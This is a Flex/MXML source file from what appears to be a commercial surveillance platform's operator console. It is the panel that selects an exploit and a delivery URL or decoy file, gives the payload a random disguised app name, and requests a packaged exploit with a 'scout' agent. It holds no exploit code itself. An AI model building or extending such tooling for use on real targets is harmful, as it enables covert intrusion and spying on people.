src/it/ht/rcs/console/operations/view/agents/build/BuildExploit.mxml
<?xml version="1.0" encoding="utf-8"?>
<s:Group xmlns:fx="http://ns.adobe.com/mxml/2009"
xmlns:s="library://ns.adobe.com/flex/spark"
xmlns:mx="library://ns.adobe.com/flex/mx" width="370" height="100%"
xmlns:build="it.ht.rcs.console.operations.view.agents.build.*"
creationComplete="init(event)">
<fx:Script>
<![CDATA[
import com.gsolo.encryption.MD5;
import flashx.textLayout.conversion.TextConverter;
import it.ht.rcs.console.build.controller.BuildManager;
import it.ht.rcs.console.build.model.Exploit;
import it.ht.rcs.console.events.DataLoadedEvent;
import it.ht.rcs.console.monitor.controller.LicenseManager;
import it.ht.rcs.console.network.controller.CollectorManager;
import it.ht.rcs.console.operations.view.configuration.ConfigurationView;
import it.ht.rcs.console.task.controller.DownloadManager;
import it.ht.rcs.console.utils.AlertPopUp;
import locale.R;
import mx.collections.ArrayCollection;
import mx.collections.ArrayList;
import mx.collections.ListCollectionView;
import mx.collections.Sort;
import mx.collections.SortField;
import mx.core.UIComponent;
import mx.events.FlexEvent;
import mx.managers.PopUpManager;
import mx.rpc.events.FaultEvent;
import mx.rpc.events.ResultEvent;
import mx.utils.Base64Encoder;
import spark.events.IndexChangeEvent;
private var fileReference:FileReference;
[Bindable]
private var exploits:ListCollectionView;
[Bindable]
private var urls:ListCollectionView;
[Bindable]
public var configView:ConfigurationView;
private var params:Object = {platform: 'exploit', generate: {}, melt:{}};
[Bindable]
private var _platform:String;
[Bindable]
private var _explots_version:String = "";
protected function init(event:FlexEvent):void
{
BuildManager.instance.refresh();
BuildManager.instance.addEventListener(DataLoadedEvent.DATA_LOADED, function ():void { format.selectedIndex = 0; exploits.refresh(); });
exploits = BuildManager.instance.getExploitView(null, platformFilterFunction);
BuildManager.instance.getVersion(function (result:ResultEvent):void {
_explots_version = result.result.version as String;
});
// get the list of entry points
CollectorManager.instance.refresh();
urls = CollectorManager.instance.getEntryPointsView();
}
public function set platform(value:*):void
{
_platform = value;
createBtn.platforms = [value];
exploits.refresh();
exploit.selectedItem=null;
}
private function platformFilterFunction(item:Object):Boolean
{
var e:Exploit = item as Exploit;
if (e.platform != _platform)
return false;
if (format.selectedItem == null || format.selectedItem == '*')
return true;
return e.format.source.indexOf(format.selectedItem) != -1;
}
private function collName(o:Object):String
{
if (o == null)
return '';
if (o.hasOwnProperty('address'))
return "http://" + o['address'] + '/';
return o.toString();
}
private function exploitName(o:Object):String
{
if (o != null)
return o['name'];
return '';
}
private function browse():void
{
fileReference = new FileReference();
fileReference.addEventListener(Event.SELECT, fileSelection);
var filter:FileFilter = new FileFilter("Allowed files", "*."+format.selectedItem);
fileReference.browse([filter]);
}
private function fileSelection(event:Event):void
{
currentState = 'fileSelected';
fileName.text = event.target.name;
fileReference.addEventListener(HTTPStatusEvent.HTTP_STATUS, onUploadError);
fileReference.addEventListener(IOErrorEvent.IO_ERROR, onUploadError);
fileReference.addEventListener(SecurityErrorEvent.SECURITY_ERROR, onUploadError);
fileReference.addEventListener(DataEvent.UPLOAD_COMPLETE_DATA, onUploadComplete);
uploadPopup = PopUpManager.createPopUp(this.parentDocument as DisplayObject, UploadPopup, true) as UploadPopup;
uploadPopup.fileReference = fileReference;
PopUpManager.centerPopUp(uploadPopup);
}
private function complete_with_slash(url:String):String
{
var ret:String = url;
if (url.charAt(url.length-1) != '/')
ret += '/';
return ret;
}
private var uploadPopup:UploadPopup;
private function create():void
{
var appname:String = parentDocument.factory.ident.substring(4);
appname += parentDocument.factory.name + Math.random().toString();
var scrambled:String = MD5.encrypt(appname);
appname = scrambled.substring(7, 17);
params['generate']['exploit'] = exploit.selectedItem.id;
params['generate']['platforms'] = [parentDocument.platform];
params['generate']['binary'] = {demo: createBtn.demo.selected, admin: false};
params['generate']['melt'] = {admin: false, demo: createBtn.demo.selected, scout: true};
params['factory'] = {_id: parentDocument.factory._id};
params['melt']['appname'] = appname;
if (_platform == 'windows')
params['melt']['appname'] += '.exe';
if (exploit.selectedItem.params.file != null) {
if (currentState != 'fileSelected') {
AlertPopUp.show(R.get('SELECT_FILE'));
return;
}
params['melt']['filename'] = fileName.text;
}
if (exploit.selectedItem.params.string != null) {
if (string.selectedItem != null) {
if (exploit.selectedItem.multiserver) {
params['melt']['url'] = complete_with_slash(string.textInput.text) + appname + "/";
} else {
params['melt']['url'] = complete_with_slash(string.textInput.text) + appname + "/" + params['melt']['appname'];
}
} else {
AlertPopUp.show(R.get('SELECT_URL'));
return;
}
}
if (exploit.selectedItem.params.combo != null) {
if (combo.selectedItem != null) {
params['melt']['combo'] = (combo.selectedItem as String).split('|')[1];
} else {
AlertPopUp.show(R.get('SELECT_OPTION'));
return;
}
}
var filename:String = parentDocument.factory.name + "_" + exploit.selectedItem.id + '_exploit.zip'
DownloadManager.instance.createTask("build", filename, params, onSuccess, onFailure);
}
private function onUploadError(event:Event):void
{
PopUpManager.removePopUp(uploadPopup);
AlertPopUp.show(event.type);
}
private function onUploadComplete(event:DataEvent):void
{
PopUpManager.removePopUp(uploadPopup);
params['melt']['input'] = event.data;
}
private function onSuccess(e:ResultEvent):void
{
PopUpManager.removePopUp(((parentDocument as UIComponent).parentDocument).hostComponent);
}
private function onFailure(e:FaultEvent):void
{
AlertPopUp.show(R.get('TASK_ALREADY_CREATED'));
}
protected function changeExploit(event:IndexChangeEvent):void
{
currentState = 'normal';
description.text = "";
description.textFlow = TextConverter.importToFlow(exploit.selectedItem.description, TextConverter.TEXT_FIELD_HTML_FORMAT);
if (exploit.selectedItem.address != null) {
string.dataProvider = new ArrayList(["http://" + exploit.selectedItem.address + '/']);
string.textInput.editable = false;
} else {
string.textInput.editable = true;
string.dataProvider = urls;
}
string.selectedIndex = 0;
}
protected function changeFormat(event:IndexChangeEvent):void
{
exploits.refresh();
exploit.selectedIndex = 0;
}
private function comboLabel(o:Object):String
{
var str:String = o as String;
return str.split('|')[0]
}
]]>
</fx:Script>
<s:states>
<s:State name="normal"/>
<s:State name="fileSelected"/>
</s:states>
<s:VGroup top="5" bottom="30" left="5" right="5">
<s:HGroup verticalAlign="middle">
<s:Label fontWeight="bold" text="{R.get('CHOOSE_FILE_TYPE')}:"/>
<s:ComboBox id="format" dataProvider="{BuildManager.instance.getFormats(_platform)}" width="55" change="changeFormat(event)" selectedIndex="0"/>
<s:Spacer width="100" />
<s:Label fontWeight="bold" text="{R.get('VERSION')}:"/>
<s:Label fontWeight="bold" text="{_explots_version}"/>
</s:HGroup>
<s:Label fontWeight="bold" text="{R.get('CHOOSE_EXPLOIT')}:"/>
<s:ComboBox id="exploit" width="360" dataProvider="{exploits}" itemRenderer="it.ht.rcs.console.operations.view.agents.build.ExploitRenderer" labelFunction="exploitName" selectedIndex="0" change="changeExploit(event)"/>
<s:HGroup left="0" right="0" visible="{exploit.selectedItem != null && exploit.selectedItem.params != null}" verticalAlign="middle" width="100%">
<s:HGroup verticalAlign="middle" width="100%" visible="{exploit.selectedItem.params.string != null}" includeInLayout="{exploit.selectedItem.params.string != null}">
<s:Label text="{exploit.selectedItem.params.string}" fontWeight="bold"/>
<s:ComboBox id="string" width="100%" dataProvider="{urls}" labelFunction="collName"/>
</s:HGroup>
<s:HGroup verticalAlign="middle" width="100%" height="25" visible="{exploit.selectedItem.params.file != null}" includeInLayout="{exploit.selectedItem.params.file != null}">
<s:Label text="{exploit.selectedItem.params.file}"/>
<s:Button excludeFrom="fileSelected" width="100" label="{R.get('BROWSE')}..." click="browse()"/>
<s:Label id="fileName" includeIn="fileSelected" buttonMode="true" click="browse()" maxDisplayedLines="1" width="140" toolTip="{R.get('CLICK_TO_CHANGE_FILE')}"/>
</s:HGroup>
<s:HGroup verticalAlign="middle" width="100%" visible="{exploit.selectedItem.params.combo != null}" includeInLayout="{exploit.selectedItem.params.combo != null}">
<s:DropDownList id="combo" width="100%" dataProvider="{exploit.selectedItem.params.combo}" labelFunction="comboLabel" selectedIndex="{exploit.selectedItem.params.combo != null ? 0 : -1}"/>
</s:HGroup>
</s:HGroup>
<s:HGroup>
<s:Label id="expid" fontWeight="bold" text="ID: {exploit.selectedItem.id}"/>
<s:Spacer width="100%" />
<s:Label id="expcat" fontWeight="bold" text="Catetory: {exploit.selectedItem.category}"/>
</s:HGroup>
<s:RichText id="description" width="100%" height="100%" textFlow="{TextConverter.importToFlow(exploit.selectedItem.description, TextConverter.TEXT_FIELD_HTML_FORMAT)}"/>
</s:VGroup>
<build:CreateWithDemoButton id="createBtn" left="10" bottom="0" right="10" create="{create}" configView="{configView}"/>
</s:Group>